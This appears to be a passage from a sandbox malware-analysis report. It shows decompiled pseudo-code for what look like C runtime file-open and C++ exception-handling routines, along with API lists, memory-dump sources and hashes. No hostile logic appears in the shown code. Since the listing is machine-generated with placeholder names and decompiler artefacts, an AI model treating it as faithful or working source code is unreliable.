                                                                    				if((0x00008000 & _t134) != 0) {
                                                                    					L7:
                                                                    					_t119 = 3;
                                                                    					_t82 = _t134 & _t119;
                                                                    					if(_t82 == 0) {
                                                                    						_v20 = 0x80000000;
                                                                    						L13:
                                                                    						if(_t122 == 0x10) {
                                                                    							_v12 = 0;
                                                                    							L22:
                                                                    							_t84 = _t134 & 0x00000700;
                                                                    							__eflags = _t84 - 0x400;
                                                                    							if(__eflags > 0) {
                                                                    								__eflags = _t84 - 0x500;
                                                                    								if(_t84 == 0x500) {
                                                                    									L37:
                                                                    									_v16 = 1;
                                                                    									L38:
                                                                    									_t85 = _a16;
                                                                    									__eflags = 0x00000100 & _t85;
                                                                    									_t141 = 0x80;
                                                                    									if((0x00000100 & _t85) != 0) {
                                                                    										_t131 =  *0x448264; // 0x0
                                                                    										__eflags =  !_t131 & _a20;
                                                                    										if(( !_t131 & _a20) >= 0) {
                                                                    											_t141 = 1;
                                                                    											__eflags = 1;
                                                                    										}
                                                                    									}
                                                                    									__eflags = _t85 & 0x00000040;
                                                                    									if((_t85 & 0x00000040) != 0) {
                                                                    										_v18 = _v18 | 0x00000001;
                                                                    										_t141 = _t141 | 0x04000000;
                                                                    										__eflags =  *0x448268 - 2;
                                                                    										if( *0x448268 == 2) {
                                                                    											_t34 =  &_v12;
                                                                    											 *_t34 = _v12 | 0x00000004;
                                                                    											__eflags =  *_t34;
                                                                    										}
                                                                    									}
                                                                    									__eflags = _t85 & 0x00000010;
                                                                    									if((_t85 & 0x00000010) != 0) {
                                                                    										_t141 = _t141 | 0x00000100;
                                                                    										__eflags = _t141;
                                                                    									}
                                                                    									__eflags = _t85 & 0x00000020;
                                                                    									if(__eflags == 0) {
                                                                    										__eflags = _t85 & 0x00000010;
                                                                    										if(__eflags != 0) {
                                                                    											_t141 = _t141 | 0x10000000;
                                                                    											__eflags = _t141;
                                                                    										}
                                                                    									} else {
                                                                    										_t141 = _t141 | 0x08000000;
                                                                    									}
                                                                    									_t138 = E00428BF3(_t119, 0x100, _t141, __eflags);
                                                                    									_t120 = _t119 | 0xffffffff;
                                                                    									__eflags = _t138 - _t120;
                                                                    									if(_t138 != _t120) {
                                                                    										 *_a4 = 1;
                                                                    										 *_a8 = _t138;
                                                                    										_t142 = CreateFileA(_a12, _v20, _v12,  &_v32, _v16, _t141, 0);
                                                                    										__eflags = _t142 - _t120;
                                                                    										if(_t142 == _t120) {
                                                                    											L56:
                                                                    											E00426868(GetLastError());
                                                                    											goto L52;
                                                                    										}
                                                                    										_t94 = GetFileType(_t142);
                                                                    										__eflags = _t94;
                                                                    										if(_t94 != 0) {
                                                                    											__eflags = _t94 - 2;
                                                                    											if(_t94 != 2) {
                                                                    												__eflags = _t94 - 3;
                                                                    												if(_t94 == 3) {
                                                                    													_t51 =  &_v5;
                                                                    													 *_t51 = _v5 | 0x00000008;
                                                                    													__eflags =  *_t51;
                                                                    												}
                                                                    											} else {
                                                                    												_v5 = _v5 | 0x00000040;
                                                                    											}
                                                                    											E004289F5(_t138, _t142);
                                                                    											_v5 = _v5 | 0x00000001;
                                                                    											_t121 = 0x44b140 + (_t138 >> 5) * 4;
                                                                    											_t100 = _v5;
                                                                    											_t127 =  *_t121;
                                                                    											_t144 = (_t138 & 0x0000001f) + (_t138 & 0x0000001f) * 8 << 2;
                                                                    											_v5 = _t100;
                                                                    											_t61 =  &_v5;
                                                                    											 *_t61 = _v5 & 0x00000048;
                                                                    											__eflags =  *_t61;
                                                                    											 *((char*)(_t144 +  *_t121 + 4)) = _t100;
                                                                    											if( *_t61 != 0) {
                                                                    												L66:
                                                                    												__eflags = _v5;
                                                                    												if(_v5 == 0) {
                                                                    													__eflags = _a16 & 0x00000008;
                                                                    													if((_a16 & 0x00000008) != 0) {
                                                                    														_t74 =  *_t121 + 4; // 0x4
                                                                    														_t102 = _t144 + _t74;
                                                                    														 *_t102 =  *_t102 | 0x00000020;
                                                                    														__eflags =  *_t102;
                                                                    													}
                                                                    												}
                                                                    												_t93 = _t138;
                                                                    												goto L70;
                                                                    											} else {
                                                                    												__eflags = _t100;
                                                                    												if(_t100 >= 0) {
                                                                    													goto L66;
                                                                    												}
                                                                    												__eflags = _a16 & 0x00000002;
                                                                    												if(__eflags == 0) {
                                                                    													goto L66;
                                                                    												}
                                                                    												_t103 = E004284D0(__eflags, _t138, 0xffffffff, 2);
                                                                    												__eflags = _t103 - 0xffffffff;
                                                                    												_v20 = _t103;
                                                                    												if(_t103 != 0xffffffff) {
                                                                    													_v6 = 0;
                                                                    													__eflags = E00426055(_t138,  &_v6, 1);
                                                                    													if(__eflags != 0) {
                                                                    														L75:
                                                                    														__eflags = E004284D0(__eflags, _t138, 0, 0) - 0xffffffff;
                                                                    														if(__eflags != 0) {
                                                                    															goto L66;
                                                                    														}
                                                                    														L76:
                                                                    														_t107 = E0042643C(__eflags, _t138);
                                                                    														L35:
                                                                    														_t93 = _t107 | 0xffffffff;
                                                                    														goto L70;
                                                                    													}
                                                                    													__eflags = _v6 - 0x1a;
                                                                    													if(__eflags != 0) {
                                                                    														goto L75;
                                                                    													}
                                                                    													__eflags = E00429E28(_t121, _t127, 0x700, _t138, _t144, __eflags, _t138, _v20) - 0xffffffff;
                                                                    													if(__eflags == 0) {
                                                                    														goto L76;
                                                                    													}
                                                                    													goto L75;
                                                                    												}
                                                                    												__eflags =  *((intOrPtr*)(E0042685F())) - 0x83;
                                                                    												if(__eflags != 0) {
                                                                    													goto L76;
                                                                    												}
                                                                    												goto L66;
                                                                    											}
                                                                    										}
                                                                    										CloseHandle(_t142);
                                                                    										goto L56;
                                                                    									} else {
                                                                    										 *((intOrPtr*)(E00426856())) = 0x18;
                                                                    										_t112 = E0042685F();
                                                                    										 *_t112 =  *_t112 & 0x00000000;
                                                                    										__eflags =  *_t112;
                                                                    										L52:
                                                                    										_t93 = _t120;
                                                                    										L70:
                                                                    										return _t93;
                                                                    									}
                                                                    								}
                                                                    								__eflags = _t84 - 0x600;
                                                                    								if(_t84 == 0x600) {
                                                                    									L36:
                                                                    									_v16 = 5;
                                                                    									goto L38;
                                                                    								}
                                                                    								__eflags = _t84 - 0x700;
                                                                    								if(_t84 == 0x700) {
                                                                    									goto L37;
                                                                    								}
                                                                    								L34:
                                                                    								 *((intOrPtr*)(E00426856())) = 0x16;
                                                                    								_t107 = E0042685F();
                                                                    								 *_t107 = 0;
                                                                    								goto L35;
                                                                    							}
                                                                    							if(__eflags == 0) {
                                                                    								L30:
                                                                    								_v16 = _t119;
                                                                    								goto L38;
                                                                    							}
                                                                    							__eflags = _t84;
                                                                    							if(_t84 == 0) {
                                                                    								goto L30;
                                                                    							}
                                                                    							__eflags = _t84 - 0x100;
                                                                    							if(_t84 == 0x100) {
                                                                    								_v16 = 4;
                                                                    								goto L38;
                                                                    							}
                                                                    							__eflags = _t84 - 0x200;
                                                                    							if(_t84 == 0x200) {
                                                                    								goto L36;
                                                                    							}
                                                                    							__eflags = _t84 - 0x300;
                                                                    							if(_t84 != 0x300) {
                                                                    								goto L34;
                                                                    							}
                                                                    							_v16 = 2;
                                                                    							goto L38;
                                                                    						}
                                                                    						if(_t122 == 0x20) {
                                                                    							_v12 = 1;
                                                                    							goto L22;
                                                                    						}
                                                                    						if(_t122 == 0x30) {
                                                                    							_v12 = 2;
                                                                    							goto L22;
                                                                    						}
                                                                    						if(_t122 == 0x40) {
                                                                    							_v12 = _t119;
                                                                    							goto L22;
                                                                    						}
                                                                    						L17:
                                                                    						 *((intOrPtr*)(E00426856())) = 0x16;
                                                                    						_t115 = E0042685F();
                                                                    						 *_t115 = 0;
                                                                    						return _t115 | 0xffffffff;
                                                                    					}
                                                                    					_t117 = _t82 - 1;
                                                                    					if(_t117 == 0) {
                                                                    						_v20 = 0x40000000;
                                                                    						goto L13;
                                                                    					}
                                                                    					if(_t117 != 1) {
                                                                    						goto L17;
                                                                    					} else {
                                                                    						_v20 = 0xc0000000;
                                                                    						goto L13;
                                                                    					}
                                                                    				} else {
                                                                    					if((_t134 & 0x00000040) != 0) {
                                                                    						L6:
                                                                    						_v5 = _v5 | 0x00000080;
                                                                    						goto L7;
                                                                    					}
                                                                    					_t153 =  *0x448594 - 0x8000; // 0x0
                                                                    					if(_t153 == 0) {
                                                                    						goto L7;
                                                                    					}
                                                                    					goto L6;
                                                                    				}
                                                                    			}





































                                                                    0x00428ec6
                                                                    0x00428ecc
                                                                    0x00428ed5
                                                                    0x00428edc
                                                                    0x00428edf
                                                                    0x00428eea
                                                                    0x00428ef1
                                                                    0x00428ee1
                                                                    0x00428ee1
                                                                    0x00428ee4
                                                                    0x00428ee4
                                                                    0x00428efc
                                                                    0x00428f0f
                                                                    0x00428f13
                                                                    0x00428f16
                                                                    0x00428f18
                                                                    0x00428f32
                                                                    0x00428f39
                                                                    0x00428f3c
                                                                    0x00428f7e
                                                                    0x00428f81
                                                                    0x00428f88
                                                                    0x00428f8f
                                                                    0x00428f97
                                                                    0x00428fc8
                                                                    0x00428fcd
                                                                    0x00428ffd
                                                                    0x00428ffd
                                                                    0x00429004
                                                                    0x00429004
                                                                    0x00429007
                                                                    0x00429009
                                                                    0x0042900e
                                                                    0x00429010
                                                                    0x0042901b
                                                                    0x0042901d
                                                                    0x00429021
                                                                    0x00429021
                                                                    0x00429021
                                                                    0x0042901d
                                                                    0x00429022
                                                                    0x00429024
                                                                    0x00429026
                                                                    0x0042902a
                                                                    0x00429030
                                                                    0x00429037
                                                                    0x00429039
                                                                    0x00429039
                                                                    0x00429039
                                                                    0x00429039
                                                                    0x00429037
                                                                    0x0042903d
                                                                    0x00429040
                                                                    0x00429042
                                                                    0x00429042
                                                                    0x00429042
                                                                    0x00429044
                                                                    0x00429046
                                                                    0x00429050
                                                                    0x00429052
                                                                    0x00429054
                                                                    0x00429054
                                                                    0x00429054
                                                                    0x00429048
                                                                    0x00429048
                                                                    0x00429048
                                                                    0x0042905f
                                                                    0x00429061
                                                                    0x00429064
                                                                    0x00429066
                                                                    0x0042908b
                                                                    0x00429094
                                                                    0x004290a9
                                                                    0x004290ab
                                                                    0x004290ad
                                                                    0x004290c1
                                                                    0x004290c8
                                                                    0x00000000
                                                                    0x004290cd
                                                                    0x004290b0
                                                                    0x004290b6
                                                                    0x004290b8
                                                                    0x004290d0
                                                                    0x004290d3
                                                                    0x004290db
                                                                    0x004290de
                                                                    0x004290e0
                                                                    0x004290e0
                                                                    0x004290e0
                                                                    0x004290e0
                                                                    0x004290d5
                                                                    0x004290d5
                                                                    0x004290d5
                                                                    0x004290e6
                                                                    0x004290eb
                                                                    0x004290f4
                                                                    0x00429103
                                                                    0x00429108
                                                                    0x0042910a
                                                                    0x0042910d
                                                                    0x00429110
                                                                    0x00429110
                                                                    0x00429110
                                                                    0x00429114
                                                                    0x00429118
                                                                    0x00429146
                                                                    0x00429146
                                                                    0x0042914a
                                                                    0x0042914c
                                                                    0x00429150
                                                                    0x00429154
                                                                    0x00429154
                                                                    0x00429158
                                                                    0x00429158
                                                                    0x00429158
                                                                    0x00429150
                                                                    0x0042915b
                                                                    0x00000000
                                                                    0x0042911a
                                                                    0x0042911a
                                                                    0x0042911c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042911e
                                                                    0x00429122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429129
                                                                    0x00429131
                                                                    0x00429134
                                                                    0x00429137
                                                                    0x00429169
                                                                    0x00429175
                                                                    0x00429177
                                                                    0x0042918f
                                                                    0x0042919c
                                                                    0x0042919f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004291a1
                                                                    0x004291a2
                                                                    0x00428fec
                                                                    0x00428fec
                                                                    0x00000000
                                                                    0x00428fec
                                                                    0x00429179
                                                                    0x0042917d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429188
                                                                    0x0042918d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042918d
                                                                    0x0042913e
                                                                    0x00429144
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00429144
                                                                    0x00429118
                                                                    0x004290bb
                                                                    0x00000000
                                                                    0x00429068
                                                                    0x0042906d
                                                                    0x00429073
                                                                    0x00429078
                                                                    0x00429078
                                                                    0x0042907b
                                                                    0x0042907b
                                                                    0x0042915d
                                                                    0x00000000
                                                                    0x0042915d
                                                                    0x00429066
                                                                    0x00428fcf
                                                                    0x00428fd4
                                                                    0x00428ff4
                                                                    0x00428ff4
                                                                    0x00000000
                                                                    0x00428ff4
                                                                    0x00428fd6
                                                                    0x00428fd8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428fda
                                                                    0x00428fdf
                                                                    0x00428fe5
                                                                    0x00428fea
                                                                    0x00000000
                                                                    0x00428fea
                                                                    0x00428f99
                                                                    0x00428fc3
                                                                    0x00428fc3
                                                                    0x00000000
                                                                    0x00428fc3
                                                                    0x00428f9b
                                                                    0x00428f9d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428f9f
                                                                    0x00428fa1
                                                                    0x00428fba
                                                                    0x00000000
                                                                    0x00428fba
                                                                    0x00428fa3
                                                                    0x00428fa8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428faa
                                                                    0x00428faf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428fb1
                                                                    0x00000000
                                                                    0x00428fb1
                                                                    0x00428f41
                                                                    0x00428f75
                                                                    0x00000000
                                                                    0x00428f75
                                                                    0x00428f46
                                                                    0x00428f6c
                                                                    0x00000000
                                                                    0x00428f6c
                                                                    0x00428f4b
                                                                    0x00428f67
                                                                    0x00000000
                                                                    0x00428f67
                                                                    0x00428f4d
                                                                    0x00428f52
                                                                    0x00428f58
                                                                    0x00428f5d
                                                                    0x00000000
                                                                    0x00428f5f
                                                                    0x00428f1a
                                                                    0x00428f1b
                                                                    0x00428f29
                                                                    0x00000000
                                                                    0x00428f29
                                                                    0x00428f1e
                                                                    0x00000000
                                                                    0x00428f20
                                                                    0x00428f20
                                                                    0x00000000
                                                                    0x00428f20
                                                                    0x00428efe
                                                                    0x00428f01
                                                                    0x00428f0b
                                                                    0x00428f0b
                                                                    0x00000000
                                                                    0x00428f0b
                                                                    0x00428f03
                                                                    0x00428f09
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00428f09

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(80000000,80000000,?,0000000C,00000001,00000080,00000000,?,00000000,00000000), ref: 004290A3
                                                                    • GetFileType.KERNEL32(00000000), ref: 004290B0
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004290BB
                                                                    • GetLastError.KERNEL32 ref: 004290C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateErrorHandleLastType
                                                                    • String ID: H
                                                                    • API String ID: 1809617866-2852464175
                                                                    • Opcode ID: e45f55f5cad08953091bb8ec50569213ae6d252bea914ca6b0275c789c51d8e0
                                                                    • Instruction ID: 890c1065f39dcc2e19e683cc44ee1677a8af83e3ba3c4683cd4a3a0bc0fb7659
                                                                    • Opcode Fuzzy Hash: e45f55f5cad08953091bb8ec50569213ae6d252bea914ca6b0275c789c51d8e0
                                                                    • Instruction Fuzzy Hash: 95814330B052399AEF208F99E9443BE7B61AF02358FAA415FE410A72C1CB7D4D45C75E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E00423913(void* __ebx, void* __edi, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, char _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                    				char _v5;
                                                                    				signed int _v8;
                                                                    				intOrPtr* _v12;
                                                                    				char _v16;
                                                                    				intOrPtr* _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				char _v36;
                                                                    				intOrPtr _v40;
                                                                    				char _v60;
                                                                    				intOrPtr _t87;
                                                                    				void* _t90;
                                                                    				intOrPtr* _t99;
                                                                    				intOrPtr _t100;
                                                                    				void* _t104;
                                                                    				intOrPtr _t106;
                                                                    				void* _t110;
                                                                    				intOrPtr _t111;
                                                                    				intOrPtr _t112;
                                                                    				intOrPtr _t113;
                                                                    				void* _t116;
                                                                    				intOrPtr* _t117;
                                                                    				intOrPtr _t120;
                                                                    				intOrPtr _t127;
                                                                    				intOrPtr _t128;
                                                                    				intOrPtr _t130;
                                                                    				void* _t135;
                                                                    				intOrPtr _t138;
                                                                    				intOrPtr* _t139;
                                                                    				intOrPtr _t141;
                                                                    				intOrPtr _t142;
                                                                    				void* _t147;
                                                                    				void* _t148;
                                                                    				void* _t151;
                                                                    
                                                                    				_t139 = __esi;
                                                                    				_t135 = __edi;
                                                                    				_t116 = __ebx;
                                                                    				_t148 = _t147 - 0x24;
                                                                    				_t87 =  *((intOrPtr*)(_a8 + 8));
                                                                    				_v5 = 0;
                                                                    				_v32 = _t87;
                                                                    				if(_t87 < 0xffffffff) {
                                                                    					L2:
                                                                    					E00423EBB(_t153);
                                                                    				} else {
                                                                    					_t120 = _a20;
                                                                    					_t153 = _t87 -  *((intOrPtr*)(_t120 + 4));
                                                                    					if(_t87 >=  *((intOrPtr*)(_t120 + 4))) {
                                                                    						goto L2;
                                                                    					}
                                                                    				}
                                                                    				_push(_t116);
                                                                    				_t117 = _a4;
                                                                    				_push(_t139);
                                                                    				_push(_t135);
                                                                    				if( *_t117 != 0xe06d7363) {
                                                                    					L40:
                                                                    					__eflags = _a24;
                                                                    					if(_a24 != 0) {
                                                                    						_push(8);
                                                                    						_push(0x430470);
                                                                    						E0042422C(_t117, _t135, _t139);
                                                                    						_t90 = E00423BDF();
                                                                    						__eflags =  *(_t90 + 0x6c);
                                                                    						if( *(_t90 + 0x6c) != 0) {
                                                                    							_v8 = _v8 & 0x00000000;
                                                                    							 *((intOrPtr*)(E00423BDF() + 0x6c))();
                                                                    							_t83 =  &_v8;
                                                                    							 *_t83 = _v8 | 0xffffffff;
                                                                    							__eflags =  *_t83;
                                                                    						}
                                                                    						E00426A34();
                                                                    						E00429729(_t117, _t135, _t139, __eflags);
                                                                    						E0042552E(3);
                                                                    						asm("int3");
                                                                    						_t85 =  &_v60; // 0x423938
                                                                    						 *0x430100( *_t85, 0x16, 0xa);
                                                                    						__eflags = 1;
                                                                    						return 1;
                                                                    					} else {
                                                                    						_t99 = E00423855(_t120, _t117, _a8, _a12, _a16, _a20, _v32, _a28, _a32);
                                                                    						goto L38;
                                                                    					}
                                                                    				} else {
                                                                    					_t135 = 0x19930520;
                                                                    					if( *((intOrPtr*)(_t117 + 0x10)) != 3) {
                                                                    						L18:
                                                                    						if( *_t117 != 0xe06d7363 ||  *((intOrPtr*)(_t117 + 0x10)) != 3) {
                                                                    							goto L40;
                                                                    						} else {
                                                                    							_t100 =  *((intOrPtr*)(_t117 + 0x14));
                                                                    							if(_t100 == _t135 || _t100 == 0x19930521) {
                                                                    								_t141 = _v32;
                                                                    								_t99 = E00422215(_t120, _a20, _a28, _t141,  &_v16,  &_v36);
                                                                    								_t151 = _t148 + 0x14;
                                                                    								_v12 = _t99;
                                                                    								if(_v16 < _v36) {
                                                                    									L25:
                                                                    									while(1) {
                                                                    										if( *_t99 <= _t141 && _t141 <=  *((intOrPtr*)(_t99 + 4))) {
                                                                    											_t127 =  *((intOrPtr*)(_t99 + 0xc));
                                                                    											_t142 =  *((intOrPtr*)(_t99 + 0x10));
                                                                    											_v28 = _t127;
                                                                    											if(_t127 > 0) {
                                                                    												do {
                                                                    													_t128 =  *((intOrPtr*)(_t117 + 0x1c));
                                                                    													_t40 =  *((intOrPtr*)(_t128 + 0xc)) + 4; // 0x4
                                                                    													_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0xc))));
                                                                    													_v20 = _t40;
                                                                    													_v24 = _t130;
                                                                    													if(_t130 <= 0) {
                                                                    														goto L32;
                                                                    													} else {
                                                                    														while(1) {
                                                                    															_v40 =  *_v20;
                                                                    															_t104 = E0042330F( *_v20, _t142,  *((intOrPtr*)(_t117 + 0x1c)));
                                                                    															if(_t104 != 0) {
                                                                    																break;
                                                                    															}
                                                                    															_v24 = _v24 - 1;
                                                                    															_v20 = _v20 + 4;
                                                                    															if(_v24 > _t104) {
                                                                    																continue;
                                                                    															} else {
                                                                    																_t99 = _v12;
                                                                    																goto L32;
                                                                    															}
                                                                    															goto L35;
                                                                    														}
                                                                    														_t138 = _v12;
                                                                    														E004237EE(_t142, _v40, _t138, _a8, _t117, _a12, _a16, _a20, _a28, _a32);
                                                                    														_t117 = _a4;
                                                                    														_t151 = _t151 + 0x18;
                                                                    														_t99 = _t138;
                                                                    													}
                                                                    													goto L35;
                                                                    													L32:
                                                                    													_v28 = _v28 - 1;
                                                                    													_t142 = _t142 + 0x10;
                                                                    												} while (_v28 > 0);
                                                                    											}
                                                                    										}
                                                                    										L35:
                                                                    										_v16 = _v16 + 1;
                                                                    										_t99 = _t99 + 0x14;
                                                                    										_v12 = _t99;
                                                                    										if(_v16 < _v36) {
                                                                    											_t141 = _v32;
                                                                    											continue;
                                                                    										}
                                                                    										goto L36;
                                                                    									}
                                                                    								}
                                                                    								L36:
                                                                    								_t179 = _a24;
                                                                    								if(_a24 != 0) {
                                                                    									_push(1);
                                                                    									_push(_t117);
                                                                    									_t99 = E0042344A(_t179);
                                                                    								}
                                                                    								goto L38;
                                                                    							} else {
                                                                    								goto L40;
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						_t106 =  *((intOrPtr*)(_t117 + 0x14));
                                                                    						if(_t106 == 0x19930520 || _t106 == 0x19930521) {
                                                                    							if( *((intOrPtr*)(_t117 + 0x1c)) != 0) {
                                                                    								goto L18;
                                                                    							} else {
                                                                    								_t99 = E00423BDF();
                                                                    								if( *((intOrPtr*)(_t99 + 0x7c)) == 0) {
                                                                    									L38:
                                                                    									return _t99;
                                                                    								} else {
                                                                    									_t139 =  *((intOrPtr*)(E00423BDF() + 0x7c));
                                                                    									_a4 = _t139;
                                                                    									_a12 =  *((intOrPtr*)(E00423BDF() + 0x80));
                                                                    									_v5 = 1;
                                                                    									_t110 = E00427422(_t139, 1);
                                                                    									_t160 = _t110;
                                                                    									_pop(_t120);
                                                                    									if(_t110 == 0) {
                                                                    										E00423EBB(_t160);
                                                                    									}
                                                                    									if( *_t139 != 0xe06d7363) {
                                                                    										_t117 = _a4;
                                                                    										goto L40;
                                                                    									} else {
                                                                    										_t111 = _a4;
                                                                    										if( *((intOrPtr*)(_t111 + 0x10)) == 3) {
                                                                    											_t112 =  *((intOrPtr*)(_t111 + 0x14));
                                                                    											if(_t112 == _t135 || _t112 == 0x19930521) {
                                                                    												_t113 = _a4;
                                                                    												_t165 =  *((intOrPtr*)(_t113 + 0x1c));
                                                                    												if( *((intOrPtr*)(_t113 + 0x1c)) == 0) {
                                                                    													E00423EBB(_t165);
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										_t117 = _a4;
                                                                    										goto L18;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						} else {
                                                                    							goto L18;
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    			}






































                                                                    0x00423913
                                                                    0x00423913
                                                                    0x00423913
                                                                    0x00423916
                                                                    0x0042391c
                                                                    0x00423922
                                                                    0x00423926
                                                                    0x00423929
                                                                    0x00423933
                                                                    0x00423933
                                                                    0x0042392b
                                                                    0x0042392b
                                                                    0x0042392e
                                                                    0x00423931
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00423931
                                                                    0x00423938
                                                                    0x00423939
                                                                    0x00423942
                                                                    0x00423943
                                                                    0x00423944
                                                                    0x00423aec
                                                                    0x00423aec
                                                                    0x00423af0
                                                                    0x00423e86
                                                                    0x00423e88
                                                                    0x00423e8d
                                                                    0x00423e92
                                                                    0x00423e97
                                                                    0x00423e9b
                                                                    0x00423e9d
                                                                    0x00423ea6
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00423eb2
                                                                    0x00427a11
                                                                    0x00427a18
                                                                    0x00427a21
                                                                    0x00427a26
                                                                    0x00427a27
                                                                    0x00427a2b
                                                                    0x00427a33
                                                                    0x00427a34
                                                                    0x00423af2
                                                                    0x00423b08
                                                                    0x00000000
                                                                    0x00423b0d
                                                                    0x0042394a
                                                                    0x0042394e
                                                                    0x00423953
                                                                    0x004239e0
                                                                    0x004239e6
                                                                    0x00000000
                                                                    0x004239f6
                                                                    0x004239f6
                                                                    0x004239fb
                                                                    0x00423a08
                                                                    0x00423a1a
                                                                    0x00423a22
                                                                    0x00423a28
                                                                    0x00423a2b
                                                                    0x00000000
                                                                    0x00423a36
                                                                    0x00423a38
                                                                    0x00423a43
                                                                    0x00423a48
                                                                    0x00423a4b
                                                                    0x00423a4e
                                                                    0x00423a50
                                                                    0x00423a50
                                                                    0x00423a56
                                                                    0x00423a59
                                                                    0x00423a5d
                                                                    0x00423a60
                                                                    0x00423a63
                                                                    0x00000000
                                                                    0x00423a65
                                                                    0x00423a65
                                                                    0x00423a6d
                                                                    0x00423a70
                                                                    0x00423a78
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00423a7a
                                                                    0x00423a7d
                                                                    0x00423a84
                                                                    0x00000000
                                                                    0x00423a86
                                                                    0x00423a86
                                                                    0x00000000
                                                                    0x00423a86
                                                                    0x00000000
                                                                    0x00423a84
                                                                    0x00423a9a
                                                                    0x00423ab2
                                                                    0x00423ab7
                                                                    0x00423aba
                                                                    0x00423abd
                                                                    0x00423abd
                                                                    0x00000000
                                                                    0x00423a89
                                                                    0x00423a89
                                                                    0x00423a8c
                                                                    0x00423a8f
                                                                    0x00423a95
                                                                    0x00423a4e
                                                                    0x00423abf
                                                                    0x00423abf
                                                                    0x00423ac5
                                                                    0x00423acb
                                                                    0x00423ace
                                                                    0x00423a33
                                                                    0x00000000
                                                                    0x00423a33
                                                                    0x00000000
                                                                    0x00423ace
                                                                    0x00423a36
                                                                    0x00423ad4
                                                                    0x00423ad4
                                                                    0x00423ad8
                                                                    0x00423ada
                                                                    0x00423adc
                                                                    0x00423add
                                                                    0x00423ae3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004239fb
                                                                    0x00423959
                                                                    0x00423959
                                                                    0x0042395e
                                                                    0x0042396b
                                                                    0x00000000
                                                                    0x0042396d
                                                                    0x0042396d
                                                                    0x00423976
                                                                    0x00423ae4
                                                                    0x00423ae8
                                                                    0x0042397c
                                                                    0x00423981
                                                                    0x00423984
                                                                    0x00423995
                                                                    0x00423998
                                                                    0x0042399c
                                                                    0x004239a1
                                                                    0x004239a4
                                                                    0x004239a5
                                                                    0x004239a7
                                                                    0x004239a7
                                                                    0x004239b2
                                                                    0x00423ae9
                                                                    0x00000000
                                                                    0x004239b8
                                                                    0x004239b8
                                                                    0x004239bf
                                                                    0x004239c1
                                                                    0x004239c6
                                                                    0x004239cf
                                                                    0x004239d2
                                                                    0x004239d6
                                                                    0x004239d8
                                                                    0x004239d8
                                                                    0x004239d6
                                                                    0x004239c6
                                                                    0x004239dd
                                                                    0x00000000
                                                                    0x004239dd
                                                                    0x004239b2
                                                                    0x00423976
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0042395e
                                                                    0x00423953

                                                                    APIs
                                                                      • Part of subcall function 004237EE: _UnwindNestedFrames.LIBCMT ref: 00423811
                                                                    • RtlInitializeCriticalSection.NTDLL(89B), ref: 00427A2B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
